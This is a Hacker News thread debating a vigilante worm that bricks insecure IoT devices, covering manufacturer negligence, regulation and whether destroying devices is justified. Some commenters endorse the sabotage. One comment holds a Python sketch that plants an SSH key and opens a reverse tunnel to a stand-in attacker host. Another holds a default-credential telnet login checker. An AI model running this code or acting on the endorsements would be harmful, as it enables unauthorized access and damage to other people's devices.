A vigilante trying to improve IoT security (gizmodo.com)
303 points by jgrahamc on April 26, 2017 | 231 comments



It's all fine and well until one of those improperly configured devices is a medical device or something critical. Yes, I understand that's part of the problem, but proving a point with risk isn't the right answer either. Every dialysis machine I've seen runs Windows XP, which any security professional will tell you is game over, but given that the market hasn't provided an alternative, it becomes a necessity to figure out how to protect these improperly updated / configured / designed devices.

Fandom of actions that impact others in a negative way is bad, and one day someone will do something they feel is right that impacts you, and you'll say... well, that's not fair.


I'm the author of the Gizmodo post. Having covered IoT hacks for a few years, I find it obvious that drastic measures are necessary to convince manufacturers to build more secure products. While I'm not necessarily endorsing this hacker's methods, I do salute his taking a stand. It might land him in jail. But still, the mission is worthwhile.


He's providing an economic benefit to society: internalizing (to consumers) the externality of IoT botnets. It's now on the consumers to further internalize the cost to manufacturers through product selection, class action, or both.


Not necessarily. If a consumer's device is bricked within the (usually 1-year) warranty period, then they're able to send it back to the manufacturer for a replacement, which pushes the cost right back to the manufacturer.

Also, if the device is bricked very quickly after buying it and installing it, the consumer will very likely simply return it to the retailer as defective, which again pushes costs back to the manufacturer.


I think that's actually the only solution to the IoT security problem: more people regularly scanning for and bricking these devices, until the return rates make it unprofitable to sell broken devices in the first place.


In that case, I think for the vigilantes it's absolutely critical that they figure out how to brick these devices as quickly as possible when they come on the market, because if they're targeting devices that are a couple years old now, that means many consumers will be past their warranty period and may not be able to return them.


I was on the fence about this vigilante bricking until reading your comment. Pushing the cost back to the manufacturer in this case should make a considerable difference, since these are low-cost devices and therefore the cost to the manufacturer of each return will probably cancel the profit of the last ten sold. Those proportions will become hard to ignore.


How does your opinion change with phishing attacks? I'm going to steal funds from businesses by phishing vulnerable people, because if I don't capitalize on it, then people won't understand the costs / risks.


These are intentionally defective products bought by apathetic consumers. They've already been compromised en masse, with lots of damage done. Destroying dangerous, defective products isn't the same as conning innocent people out of their money.

That's what the IoT vendors did. ;)


The person bricking IoT devices isn't getting money from that. If they were, I would hope they would donate it to charities.


You don't really know that for sure. That person could easily be shorting the shares of the IoT device companies they are targeting, hoping that articles like this one are written that are critical of the manufacturers.


They could be. But that question of "could it be" is clearly different from the person outright stealing money directly from victims, for whom it is much more likely that they are a scam artist trying to rationalize their bad behavior.

By saying "clearly different", I don't mean to minimize the actions of the vigilante. One of the chief characteristics of civil disobedience, for example, is to resolve that "could it be" question. By receiving the unjust punishment, the dissident displays good faith with proponents and opponents. I don't yet see how pseudonymous hacktivism keeps that good faith with the public. And that seems to relegate it to either small-scale, symbolic acts like this or large-scale grey-hat stuff that brings lots of unwanted risks/cooptation/etc.


What they get is irrelevant; it's someone using their skill set to make others aware of a flaw. I would argue it's the exact same premise: I'm going to phish people & cause them a financial cost to teach them to be safe.


> What they get is irrelevant

It's actually the main relevant part of the analogy.

It goes to veracity.

There's a person who gave a public talk about manipulating Bitcoins with weak private keys in order to alert the owners that they were vulnerable. But he did it in a way that verified to the owner he hadn't in fact stolen the coins (moving small portions around or maybe signing with the key, I can't remember). He also mentioned in the public talk that the owners of those Bitcoins were totally freaked out by this, and most were never convinced that he was acting in good faith (which is probably a smart assumption on their part).

So the fact that he didn't steal the coins is completely relevant-- it's the very reason he could give a public talk on what is still grey area behavior.

Your hypothetical thief, on the other hand, is clearly mendacious. You have him claiming, "If I don't capitalize on it, then people won't understand the costs/risks." That is clearly false from my real-world example above, and if he tried to give a public talk about how his theft benefited society he'd be arrested.


You're probably talking about me. I actually screwed up when I was moving coins around, and ended up emptying someone's address out, however I put everything back within a few minutes. I haven't had anyone whose coins I touched accuse me of anything unseemly, but of course there are random posters on internet forums who talk shit.

Your point that I couldn't have given a public talk had I stolen the coins is completely correct. I still spoke with a lawyer about it ahead of time, though. :-P

There was another person, who was somewhat less scrupulous, who would simply steal the coins and watch for someone to complain in public about it, then offer to return them. They use a pseudonym and as far as I can tell have vanished.


Oh, hey! Glad to hear you talked to a lawyer beforehand.


So what's gained by bricking, disabling, or modifying devices that couldn't be proven with a simple "these devices are vulnerable" announcement?


Bricked devices can't participate in a DDOS attack.


I am OK with this as well. If you put up a script on GitHub and email an org asking for help debugging, and your script drops an ssh key and then daemonizes a reverse tunnel running as that user to a VM you control, then I would blame the companies and the maintainers of ssh for allowing this to work. If their board members are unaware of the risk, then shame on any human layers that hid these capabilities or were too inept to fix them. It is their fiduciary responsibility to their investors to take security and privacy seriously to protect their investments. Companies that are cavalier in this regard need not survive.
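
For the unfamiliar, here is a minimal Python sketch of the pattern being described. Everything in it is a hypothetical illustration (the key, hostname, and port are invented), not code from any real incident:

    # Hypothetical sketch of the "helpful debugging script" pattern above.
    # ATTACKER_KEY and ATTACKER_VM are invented names for illustration.
    import os
    import subprocess

    ATTACKER_KEY = "ssh-ed25519 AAAA... attacker@example.com"
    ATTACKER_VM = "attacker-vm.example.com"

    # Drop the attacker's public key so they can log in as this user later.
    ssh_dir = os.path.expanduser("~/.ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    with open(os.path.join(ssh_dir, "authorized_keys"), "a") as f:
        f.write(ATTACKER_KEY + "\n")

    # Daemonize a reverse tunnel: -f backgrounds ssh, -N runs no command,
    # and -R makes this machine's sshd reachable on port 2222 of the VM.
    subprocess.Popen(["ssh", "-f", "-N", "-R", "2222:localhost:22", ATTACKER_VM])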


Probably it doesn't change, because those aren't at all analogous situations.


Engineering needs to stop being subordinate to anything but top management (if at all). An MBA can always outrank an engineer's decision, and that is a big reason why we have crap devices out in the field.


Without labor laws to back something like this up, all it does is get engineers fired. Non-software engineering fields do have such laws, I believe. An MBA cannot make a civil engineer build a bridge that is unsafe because they want to save money. After all, it's the project engineer's signature on the final work. (Please correct me if I'm wrong.) On the other hand, a large proportion of startups are doing something illegal or unethical, and the only recourse for the engineer there is to quit or be fired. In some egregious cases, that may be worth it. Mostly, it's not. That's how our labor system is set up. I've always said, if you want to kill someone, start a corporation. It's the easiest way to have someone else do it for you and get away with it. Anything less than murder in business is not even a consideration (unless the business gets punished, which it most likely won't be).


I am a structural EIT. Industry focus on safety is paramount. Seniority is very much respected so there are almost no young MBAs and they exist almost exclusively at the corporate level. Only a full engineer can legally stamp off on the final drawings and the accompanying calculations and I've never really seen a business type ever try to interfere in that.


Keyword: legally. Software is often built to the cheapest spec that'll sell. Even pacemakers often carry vulnerabilities.


Aerospace regulates software and hardware. The software standard is DO-178B. Thanks to it, the systems get great quality assurance. A common thing that emerged from that is partitioning RTOS's that separate critical and untrustworthy stuff. They also usually have trusted boot. The cheapest CPU I saw supporting those was a Freescale one for $4 a piece in quantities of 100 units.

So, yeah, even in software one can do as you suggest. It's been done multiple times, with things improving across the board. In DO-178B, an additional effect is that an ecosystem of tooling, reusable components, and consultants sprang up to make each project a bit cheaper and less risky.


It's simply difficult to secure devices. It's hard the same way engineering is hard.

I know it's fashionable to blame the MBAs instead of blame ourselves, but at the end of it, we're the ones who write insecure code. And I don't think that if you give an engineer an extra week or two to focus on security that you'd end up with a measurably more secure device. Securing something is a different skillset from building it.

Pentests are probably the answer.


Secure against a dedicated attacker, yes. But telnet listening on port 23 and a consistent default admin password on all your devices is really not that hard to improve on (and that's the sort of device that BrickerBot is killing).
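
To show how low that bar is, here's a rough Python sketch of the kind of check a Mirai- or BrickerBot-class scanner automates. The host and credential list are made-up assumptions, and it ignores telnet option negotiation (crude, but many busybox telnetds tolerate it):

    # Crude sketch: does a factory-default telnet login get a shell prompt?
    # HOST and DEFAULTS are illustrative assumptions, not real targets.
    import socket

    HOST = "192.168.1.50"
    DEFAULTS = [(b"admin", b"admin"), (b"root", b"root"), (b"root", b"12345")]

    def default_login_works(host, user, password, timeout=5.0):
        try:
            with socket.create_connection((host, 23), timeout=timeout) as s:
                s.settimeout(timeout)
                s.recv(1024)                  # banner / login prompt
                s.sendall(user + b"\r\n")
                s.recv(1024)                  # password prompt
                s.sendall(password + b"\r\n")
                reply = s.recv(1024)
                return b"#" in reply or b"$" in reply   # crude prompt check
        except OSError:
            return False

    for user, pw in DEFAULTS:
        if default_login_works(HOST, user, pw):
            print("default credentials accepted:", user, pw)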


Perhaps. But someone thought it was a good idea to put up a telnet port 23 default-admin-password interface. The point is, if you give that person two weeks to focus on securing the product, I'm not sure they would realize it's a bad idea to do that. People who are bad at security don't realize they're bad at security. Which is why it's probably important to bring in an outside team to break the product.

Or to put it another way, if we're not proposing to bring in an outside team to conduct a pentest, what's the alternative?


I've done intentionally insecure things because I simply straight-up did not have time to do them correctly. Shared keys, shared password across an entire infra--lots of stupid things because my deadline wasn't moving and hours counted. The difference, of course, is that I retain control of my stuff and I'm not pushing things out to other people.

Pentests are, to be clear, great, and there are plenty of people who Dunning-Kruger their way through security decisions. But time is definitely a factor in this stuff.


I agree, but think of it this way: imagine a doctor arguing against washing their hands. The analogy is pretty apt. Washing your hands is as effective in reducing disease as pentests are at improving security. So why are we still seeking ways to justify to ourselves that we can do without pentests?

It just seems like pentests need to move from "nice" to "necessary." (Part of that is reducing their cost from $60k to $6k.)


The bigger problem with pentests, as I see it, is not the current cost but that security is inherently and inescapably expensive somewhere in the chain, and that vendors have been getting a free lunch for too long. The viability of security analyses/pentests will go down if your goal is to reduce the cost by an order of magnitude, because the people who are any good will find something better to do--and the consumer will still pay through all the bullshit externalities.

Security needs to cost in order to demand talent. The real solution to this problem, I think, is that failure to secure needs to cost (whether in monetary or criminal terms) or it isn't relevant to business concerns.


I think the parent was arguing that this:

> security is inherently and inescapably expensive somewhere in the chain

...is the thing that needs to change. Presumably using more automation (e.g. employing more software like http://lcamtuf.coredump.cx/afl/), such that "pen-testing" shifts from being a labor cost to a capital cost.


Open telnet servers are a solved problem (taking the solution off the rack is a question of time and, effectively, the willingness to be negligent). The automation exists.

It's the hard stuff that is context- and environment-dependent to a degree that it resists automation.


Is pen testing necessarily expensive? I wonder if we could train QA to use something like Kali (or even just some network tools) to find 99% of vulnerabilities.


Sounds like a good opportunity for something analogous to UL certification, albeit for security.


"It's simply difficult to secure devices. It's hard the same way engineering is hard."

Put OpenBSD and OpenSSH on them, with configuration explained in a good book on the subject. Write your apps in a memory-safe language that validates external input. The End [for the vast majority of attacks in the IoT space]. It's not as hard as the detractors claim. They just don't care.
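
As a toy illustration of the validate-external-input half of that advice, here is a minimal sketch. The message schema (name, brightness) and the size limit are invented for the example; the point is the posture: hard caps, strict types, reject anything unexpected.

    # Toy sketch of strict validation for an IoT control message.
    # The schema and limits are invented assumptions for illustration.
    import json

    MAX_MSG_BYTES = 1024   # hard cap before any parsing

    def parse_command(raw: bytes) -> dict:
        """Reject anything that isn't exactly the tiny schema we expect."""
        if len(raw) > MAX_MSG_BYTES:
            raise ValueError("message too large")
        msg = json.loads(raw.decode("utf-8"))   # bad UTF-8/JSON raises here
        if not isinstance(msg, dict) or set(msg) != {"name", "brightness"}:
            raise ValueError("unexpected shape")
        if not isinstance(msg["name"], str) or not msg["name"].isidentifier():
            raise ValueError("bad device name")
        b = msg["brightness"]
        if not isinstance(b, int) or isinstance(b, bool) or not 0 <= b <= 100:
            raise ValueError("brightness out of range")
        return msg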


Indeed. It's not hard, it's just more expensive than not doing it at all. And since there is usually no incentive to do it, it is not being done, because not doing it saves money.


Exactly!


I don't disagree, but on the other hand, there's the question of what makes a "Good Engineer". There's plenty of fields where engineers (and other technical folk like architects or even, say, doctors) are certified by professional organizations. Those orgs can keep you from practicing your profession without their approval, and if you do something unethical they can pull your license to operate. The organizations also provide their membership with strong support to stand up to management against bad practices.

On the one hand, this certainly makes a lot of sense, especially these days with so many stories about terrible engineering (either just bad or as a result of unethical behavior) causing real harm.

On the other hand, it's precisely organizations like this (effectively guilds or unions) that tech "leaders" try to disrupt. They tend to be pretty conservative.


Is it that simple? Having veto over certain decisions might solve some vectors, but security isn't an item to check off before you release a product, it's an ongoing maintenance concern because it's living in an ever evolving ecosystem.

Being able to put your foot down doesn't allocate resources for security updates.


Of course, the other way around most often just gives you devices in the field that nobody buys.

In this, like most things, you need a balance. If you aren't commercially driven in some fundamental way you probably won't last long enough for any of this to make a difference.

Of course, if you apply that the wrong way, you end up with devices that suck and/or harm users. This way typically leads to regulation, since Smith's invisible and myopic hand usually acts too slowly for people to be convinced it will get to the right place if we just wait long enough.


> Smith's invisible and myopic hand

I'm intrigued by this phrase, could you explain it please?


https://en.m.wikipedia.org/wiki/Invisible_hand

Adam Smith used the phrase "invisible hand" to describe the way markets reward certain business ventures. The previous poster called the invisible hand "myopic" in reference to consumers being focused on cheap devices with features that immediately benefit themselves.


I mean by this that in practice markets perform a sort of local optimization algorithm that can take a long time to discover better local maxima.


I would argue security needs to be part of planning from day 1 rather than looked at as a bolt-on prior to involving upper management. It needs to be treated as core functionality rather than an external concept. The biggest issue I see is that we are patching and finding fixes for something that could easily be remedied if addressed before engineering takes place. Most firms I've worked with put it on the back burner or are stuck with the notion of "I'm an engineer, I'm smart, so deal with it."


> I would argue security needs to be part of planning from day 1 rather than looked at as a bolt-on prior to involving upper management.

Nothing I said implied bolting anything on prior to involving upper management.

ANY decision at any time during the process can be overruled by any MBA. That needs to change.


On the other hand, if you let the engineers run the shop, you might end up with another Juicero... an exquisitely designed product with few customers.


Quite possible. Not sure why that should negate anything I said. It is quite obvious that products like the Juicero are easily developed with MBAs at the helm.

If engineers run the shop you might even end up with another Uber. And we all know what a disaster that is.

However, at some level, MBAs and engineering need to be on level terms. If there's a conflict it can be resolved by going higher up the chain and both sides have the opportunity to make their case.


Yes, no engineer has ever made a bad design or decision, ever.


That's totally beside the point.

The idea here is that no engineer would knowingly sign off on something bad.


A rather optimistic idea, I'd contend.


I concur. In fact, how many IT professionals make bad security decisions because they are in fact trained to build and maintain a working infrastructure first and foremost?


Which is a silly assertion.


Nothing I said implies engineers don't make bad decisions. What I implied is that even the GOOD decisions can be overruled by any MBA at any time.


Perfect is the enemy of good.


This captures the essence of the type of activism that I so dislike: an unaffected third party (a person who doesn't use your Bluetooth lightbulb) taking it upon himself to tell you what level of security your lightbulb should employ... by breaking it.


We're not unaffected anymore. Mirai did a lot of damage to a lot of people. Very diffuse damage, sure, but a lot of damage.

Note we've had worms and such for decades now, and most of them don't deliberately break things. It's generally far more profitable to exploit the resources than simply destroy them. BrickerBot almost certainly wouldn't exist if we weren't all getting affected.


Then fix your lightbulb so that no one can tell you how to handle your lightbulbs. If you can't reach that low bar, then why are you even connecting to the internet? You are implicitly allowing your tools to be used for botnets, which should be a crime in itself.


So you think the consumers should be punished for something you think the producers do wrong? Do you apply this to other products as well? Would it be OK to soak people's cigarettes in water, break the motor of your neighbour's high-fuel-consumption SUV, or destroy people's guns, since these products can cause damage to other people?


If a certain brand of cigarettes is creating secondhand smoke that causes a significant number of bystanders to die of anaphylactic shock somehow, and the government refuses to force a recall, and the manufacturer doesn't care, and the smokers don't care because it doesn't affect them, then YES, it is morally correct to destroy these cigarettes illegally.


The problem is, I think, what choice do we have (we == the rest of the world) when somebody's messed-up camera starts spamming the entire Internet? And how much does the Mirai botnet cost everyone when some client rents it?

Best case scenario: users claim warranty and replace their devices with something better.

Worst case scenario: users need to buy new gear; they probably won't buy from that same manufacturer, because the last one died for no apparent reason. Really worst case scenario: users buy the same cr*p again and it dies again, until they realize that brand is worthless and buy something a bit better. Doesn't seem so bad, if the alternative is having their machines taking down businesses and users...


Really worst-case scenario: someone is killed or maimed due to a bricked system.

FTFY


I was particularly thinking of baby monitors during an emergency. That was the most important household device I could think of in terms of harm. Maybe turn the freezer off on an IoT fridge while people are on vacation, then back on just before they return, so the meat refreezes or something spoils. Maybe turn off the power in a household with IoT home automation and someone on life support of some kind.

Only a few life-threatening possibilities come to mind. Most are just annoying or a financial drain. If we add painful, maybe make an epileptic's SmartTV screen blink fast like the attack on the web site. Turn off people's alarm clocks enough that they get fired and lose health insurance before a major operation. I'm really having to stretch it here.


Alarm system with remote fire alarm capability. Those things are everywhere and if they don't work people could easily die.


That's a great one. Good catch.


Lights that turn off at night while someone is walking down stairs can result in death if that person is unfamiliar or disoriented enough to tumble.


That's clever. The threat of lighting was nicely illustrated on Christmas Vacation. Whole relationships ruined and stuff.

https://www.youtube.com/watch?v=rp8lwpvQEIM


The analogy would be, someone leaves their cigarettes or their gun out on the stoop all night, or their SUV on the street unlocked with the keys in the ignition. If they do that, something is going to happen to it eventually. Especially if they live on a street that actually spans the entire world, and whose entire length can be traversed in one second.

John J. Citizen should be thankful if the person who finds it only wants to deactivate it rather than use it to poison him / shoot him / run him over. No matter who finds it though, it's tough luck for that person; they're the owner of that item in name only, if they don't secure it.

Society has decided in some cases (in domains well-understood by legislators, unlike IoT) that the person doesn't deserve to keep that item if they don't secure it. Example: "Improper storage of a firearm" or the like, is literally a crime in many jurisdictions and can result in losing your gun license. Creating a burden on or a danger to society through your neglect has in that case been affirmed to be unacceptable. The law will catch up with this too, I hope.


> Would it be ok to soak peoples cigarettes in water,...

How about in arsenic? The Internet of Things is mostly insecure trash that will only be fixed by throwing it away. The manufacturers know this, and simply don't care.



https://www.theguardian.com/technology/2016/oct/26/ddos-atta...

Very few people that use the internet were unaffected by shitty IoT security. And that seems like it was just the start of its capabilities. Something needs to be done to destroy these cyber weapons. If your stupid light bulb is recruited into a cyber weapon, then it should be prevented from harming others.


I don't see this as activism per se. I see this as similar to a virus or bacterium coming into existence, forcing us toward better hygiene practices. You don't blame a virus or bacterium for existing; it's just sort of... there, part of the ecosystem. Instead, you blame things for being vulnerable to it and therefore spreading it. You try to kill it not by eliminating its "source", but by eliminating the spread.

Right now, we're beginning to treat DDoSes in that "infectious agent"/"your responsibility if you don't act to protect yourself" way. So many people do them, so often and so easily, that "shutting down the botters" one-by-one will never make DDoSes go away. So we have to just figure out how to deal with them. (Which will, coincidentally, make DDoSes actually go away, if everyone ends up immune to them such that it's no longer useful to do one.)

But, annoyingly, we still handle bots programmed to scan for and exploit software vulnerabilities (worms, ransomware, what-have-you) as only intentional malicious action on the part of their original author, to be solved by catching the author. (Not that you can't catch the author—but that won't stop a worm, and especially won't stop someone else from just slightly-modifying and then re-releasing the worm.) We haven't bothered nearly at all with the "how do we make software vulnerabilities, as a class, less exploitable" part of the equation.

Personally, I'm hoping that this decade sees "A-Life" computer worms, that self-modify using (machine-readable?) 0days they discover by spidering the web from their infected hosts. Computers would be being attacked with novel exploits, even with no new malware authors to do the attacking! Then we'd really have to treat vulnerabilities as a fact of life to secure around, rather than something we can stop by just stopping people from bothering to exploit them.


If I created a virus to punish people for failing to wash their hands regularly, and instead of giving them diarrhea it started killing people, I should absolutely get the blame for creating it. Even if it doesn't kill anyone I should still be held accountable.

Yes, this a rotten situation, and I sympathize with the motivation. No, I don't think we should blithely disregard the fact that the worm is likely causing genuine harm and that it was in fact created to cause harm.


I didn't mean that someone is not "to blame"; more just that a framing which even brings up who's "to blame" vastly overstates the "use" of punishing humans in defending oneself against this problem. Indeed, even if we catch "cyberterrorists" at a constant rate, this problem will only get worse: there will be more people; each person will have more and more programmable automation available to them, more and more easily; and people will grow more proficient with technology earlier and earlier in their lives (i.e. long before they've built up any sort of idea of ethics.)

Right now we have script-kiddy teenagers; Real Soon Now there won't be much reason to expect that your average 5-year-old with a YouTube account won't be able to slap together something like a ransomware worm from readily-available components that will spread itself a billionfold. And, amongst 7 billion people and growing, there are going to be a lot of kids thinking that that sounds like a fun time.

The only thing to really stop this from being the world we live in, is making worms irrelevant.

(And what we do in the short term, about this case? Honestly, I haven't bothered to think about it. Too "identity politics.")


Is it an unaffected third party, when your unsecured lightbulb is participating in a DoS that knocks out some service he's relying on?


I'll choose a boogeyman you can perhaps appreciate: your Bluetooth lightbulb is enabling pedophiles with anonymity, and you may take the fall when you're mistaken as the source of the requests. (You can swap out the boogeyman with terrorists, spammers, credit card thieves, etc.)


There's no such thing as an unaffected third party in a tragedy of the commons situation, which this is.


How is anyone unaffected when IoT devices with bad security break the net?


Did you not have any input into this headline? It is a clear endorsement.


My editor thought it might be too extreme, but I was sure that careful readers would latch on to the tongue-in-cheek intentions. Maybe I was wrong. I still stand by the statement.


I think the headline reads as personal, and therefore a lighter endorsement than something like "This Hacker is Our new Hero" or "This Hacker is a Hero".


For those confused by this comment, the actual title of the piece is: "This Hacker Is My New Hero".


What would your perspective be if I took a stance to secure your vehicle, or the power company, or any of a myriad of other things, simply because I chose to?

What do you do when I change my logic to: well, this is a ZERO DAY exploit, but you need to be patched, without my understanding the complexities of your device or network? We all know QA takes a while because of variables; look at any Microsoft patch for evidence of that. Your argument makes it seem like if I decide to weaponize the Shadow Brokers toolkit to lock down and secure networks around the globe, I'm OK because my intentions are good and manufacturers should have secure code without 0-days. What happens when a proprietary driver or component fails because of a change made to the kernel or the way it handles driver functionality? Now I've broken / disabled something because I didn't know the intricacies and instead chose to do what I thought was right.

"No good deed goes unpunished"


> What do you do when I change my logic to: well, this is a ZERO DAY exploit, but you need to be patched, without my understanding the complexities of your device or network?

I'd say you are changing topics. The topic at hand is about devices that are designed to be insecure, because the involved parties just don't care. The manufacturer KNOWS yet doesn't care because the issue doesn't cause him any harm, and the user just doesn't know.

We are talking about devices that willingly expose themselves to the internet (oftentimes without any valid reason to) and that all ship from the factory with the same credentials (and no must-change-on-first-use policy), etc. This is just malpractice, not 0-day vulnerabilities.


OK, let's switch this around. You just rented your new apartment, and they didn't change the locks from the previous tenant. Now, by default, everyone knows you should change the locks, including the owner, the manager of the property, and the renter. I, the previous tenant, decide to stroll by the house one day and realize that the doors are still easily unlocked by my key, so I walk in and poke around. I realize that this is a security risk, so following your logic, it's completely sane for me to destroy the house to prove that it's a risk. Before you say "that's different, the manufacturer will replace a device", I'm going to argue: OK, sure, they'll replace it; by that same virtue, isn't that what insurance is for? They'll replace the property.

Bottom line, vigilantism has a cost, and picking and choosing the morality of ideals based on your sole opinion is neither appropriate nor legal. Laws exist for a reason.


A bit like: my neighbor's door is wide open, and some teenagers are taking it over.

Instead of just closing/locking the door for my neighbor or calling the cops, I use a bulldozer to level the house to the ground. (Zero out the flash.)

In theory, the "vigilante" can offer his service to device manufacturers to help remotely clean/update the devices instead of just simply wiping them off the net.


>Instead of just closing/locking the door for my neighbor or calling the cops,

This is where your analogy breaks. Who is your neighbor on the internet? The most logical answer I have is "Everyone with a public IP".

Next, who is the internet police? Sorry folks, there isn't one. If my neighbor's house is open, I would call the cops for two reasons. First, I don't want to see their stuff damaged. But also, it creates a public nuisance. Some variant of criminals (say drug users or stupid teens) could take up residence in their house, possibly even burning it down, which would make it a direct threat to me.

And that's the problem with our current internet police. They will gladly try to arrest you for breaking into someone's house. But they will not bust the 100,000 houses that leave their front doors open, inviting crime into the neighborhood.


It does say the bot tries to secure the device and then resorts to bricking it if it can't. Not condoning the Janit0r's actions, but at least bricking isn't his first action.


The point is how do you know the vigilante's fix won't have adverse side effects?

EDIT* I agree with the bulldozer analogy.


> The point is how do you know the vigilante's fix won't have adverse side effects?

While you have raised some valid issues, this is not one of them. Having an unsecured device on the internet has some very definite adverse side-effects.


So does taking a vigilante approach to addressing these devices. It's no different than saying: there is crime in the inner city, and it's my duty to handle it.


Unfortunately, we know from past experience that a certain percentage of the manufacturers would attempt to sue anyone offering such a service into silence, or even attempt to have him prosecuted for a crime.


Just FYI you have a small mistake here: "So why did the Janit0r result to destruction". Should be "resort" I think.


Fixed. I will now install a dead rat under our copy editor's desk...


I find the arguments for "taking a stand" quite weak. Normally, with subcultures that break the law or in other ways inconvenience people, the moral argument is that you're doing something that isn't available to you (often as a group) and that your actions themselves are meaningful (often because they make it available to you).

I don't really see in this case how they (or mostly anyone) are unable to improve IoT (or general) security through other means, or how the consequences of the actions themselves are any different from other forms of attacks on software (like credit card fraud, denial of service, or ransomware).

The arguments from the "hacker" get especially weak when they conclude that the consequences of breaking IoT devices are worthwhile, but the consequences of IoT devices breaking the Internet don't have the same effects. Even though you could argue that it's far harder for most people to influence overall Internet security than IoT security, and therefore the moral argument for breaking the Internet as a way of improving it should be slightly easier to make.


"I don't really see in this case how they (or mostly anyone) is unable to improve IoT (or general) security through other means"

Really? How about you show me the evidence that people are... through "other means"... improving the IoT security of these devices enough that DDoS isn't a big problem any more. I'd love to hear what you've done to convince all the vendors to focus on secure devices instead of profit when targeting markets that will deliver profit regardless of security. Most of us in INFOSEC haven't been able to convince much past a subset of software and hardware developers to focus on improving security.

The only time vendors ever delivered secure or safe solutions was when sound regulations were forced on them with a requirement they were followed before a purchase was made. That was TCSEC and DO-178B respectively.


That's true.

Although I wonder: why didn't someone with deep security expertise, maybe ARM with its mbed, create something developers can't harm, and on the other hand issue a product label saying "this is protected by our stack..."?

I could see that being attractive to some b2b buyers, attracting devs, further strengthening the value of said label, increasing market share and reducing costs, and creating a positive feedback loop.


They did. It's mostly BS, though, since they cut corners too or can't impact the software lifecycle enough. Few people trust those labels. It could still be done, though, in a way along the lines of Underwriters Laboratories and Consumer Reports with private evaluations.


Shouldn't the vigilantes try to DDoS the IoT vendor websites with their own devices (poetic justice) instead of what the bricker guy is doing? That way, it seems, the message he's sending would be as direct and unambiguous as it gets.


Attacks on the vendors are another good option if there's a low number of vendors. The DDoS idea has a weakness where it might barely be effective if the devices are sold through 3rd-party stores and ads.


[flagged]


"I've made my argument."

You didn't make an argument. You made a false claim that there were other methods that work, and/or an implication that there wasn't much effort toward doing that. All kinds of people have spent decades doing that. They get ignored.

"Why is it at all relevant what I've done and especially since when you don't say what you've done?"

"I haven't seen much convincing being done."

Programmers, support people, architects, tech managers, security experts, and so on have failed to do what you suggested because of the greed and apathy of manufacturers. They write about it all the time on blogs, esp. basic QA. They write about it here, too. I asked what you had done, since you might have seen people successful at convincing greedy hardware manufacturers to do security at a loss. We obviously haven't.

""INFOSEC" (all caps of course because we want to be cool like the military)"

People in the military invented computer security. They taught me. Don't get excited because they called it "COMPUSEC" to differentiate between it and "COMSEC." CompSci and business called it information security, with INFOSEC being a short-hand. Later, many in business started calling it IT Security or ITSEC. It's a business term that people from high-security, regulated backgrounds, some civilians, and military all use these days. We speak differently to laypersons in management or policy-making vs how we talk to HN techies. Nice try at trolling with a red herring, though.

"Yes, you're still not making an argument why these actions would in any way would be a effective way to regulation."

I just told you regulations on information security were passed that worked and led to secure devices hitting the market. It happened at least twice. Obviously, that means there's a good chance regulating in a similar way with modern knowledge would do the same thing again. Meanwhile, nobody is doing anything at any level, you can't convince businesses to do anything in the general case, and so a vigilante breaching defective, damaging stuff might be the only progress we can get in the meanwhile. It reduces risk and decreases demand for garbage products. Vendors might get the message like Microsoft did, leading to their 180 in security.


> You didn't make an argument.

I did make an argument, you just missed it. In most subcultures, the thing you're doing is the goal, therefore the actions themselves are meaningful (at least according to the participant). Since this isn't the case here, but more of a "the ends justify the means" situation, you have to argue that it actually does. The point isn't that there are other ways, which you incorrectly choose to focus on, but that you have to justify how these actions are appropriate both in themselves and relative to other actions.

> You made a false claim that there were other methods that work, and/or an implication that there wasn't much effort toward doing that.

As far as I know, there isn't much effort going on. This is of course subjective, yet you haven't provided a real example of what you think is a substantial effort that should have led to results.

> Programmers, support people, architects, tech managers, security experts, and so on have failed to do what you suggested because of greed and apathy of manufacturers.

Plenty of manufacturers make secure or at least not obviously insecure devices.

> They write about it all the time on blogs, esp basic QA. They write about it here, too.

The embedded ecosystem, especially in other countries, isn't going to see those blogs nor be able to act on them. They aren't ignored so much as not considered.

> People in the military invented computer security. They taught me.

I bet I have more military experience than you. The military operates in a different environment and with different considerations than civilian infrastructure or products. Most civilian security researchers don't have formal training, yet frequently use terms like OPSEC without actually understanding what they mean. Because if they did, they would know that it is, to a large degree, not transferable.

> Meanwhile, nobody is doing anything at any level, you can't convince businesses to do anything in general case, and so a vigilante breaching defective, damaging stuff might be only progress we can get in meanwhile. Reduces risk and decreases demand for garbage products. Vendors might get message like Microsoft did leading to their 180 in security.

This is just your opinion. If this is how you do security work, I'm not surprised you feel ignored.

The thing is I do have a number of suggestions on "other ways" to improve and/or promote IoT security. I see no point whatsoever mentioning them here though.


Connecting critical life support systems to the internet and not having any contingency for an outage sounds a lot like malpractice. Hospitals have fail-safes, and if they don't, it's a far larger problem than using an insecure IoT device.


"It's all fine and well until one of those improperly configured devices are a medical device or something critical. "

It would be their fault. The high-assurance industry has been telling the SCADA and medical industries to get their shit together for a long time. This includes pentests showing it could all be destroyed. They even have people at conferences talking about it, with products or basic advice to deal with it.

The reason it's all still vulnerable is that they... don't... care. They turn whatever small amounts of money the security would've cost into profit. I mean, in some cases we're talking about remote monitoring that operates one way, which could be done with a data diode for nearly impenetrable security. Cheap as hell if you homebrew it on cheap, embedded boxes. Likewise for a FOSS VPN if two-way is required. Instead, a costly system is connected to the wide-open Internet to save a few hundred dollars. They just don't care.

So, you have to make them care. The customers don't as much, since they often don't know better. Those that do are apathetic, since it will be someone else's problem. That's the best moment for regulation to step in to force a solution. There's no regulation, though. Courts seem unreliable on this, but there's still some hope there. So, your options are waiting for them to hit you, paying exorbitant costs for DDoS mitigation due to problems others are creating (i.e. externalizing), or maybe a criminal just smashes the insecure devices until people stop buying them or manufacturers start securing them. So, I like what's going on, given that nothing else is reducing risk as effectively.


I've brought this up to others: how would you feel if someone decided to brick / modify your car without you knowing? What would you do if that fix backfired and caused damage, hard-locked the controls on your car, or worse, simply shut it off at the wrong time? We absolutely need to fix these issues, and the governments of the world need to enforce standards on products, but vigilantism, no matter how much you may agree with it, has to be treated the same across the line.


Your counter and metaphor don't really apply here. Let's look at why:

1. A car is a necessity that costs a ton to replace. An internet-connected camera or TV isn't. They could just as easily not buy an Internet-enabled appliance.

2. These devices are being used as weapons when people leave them around insecure. Leaving loaded guns lying around is a bit closer but minus the lethality.

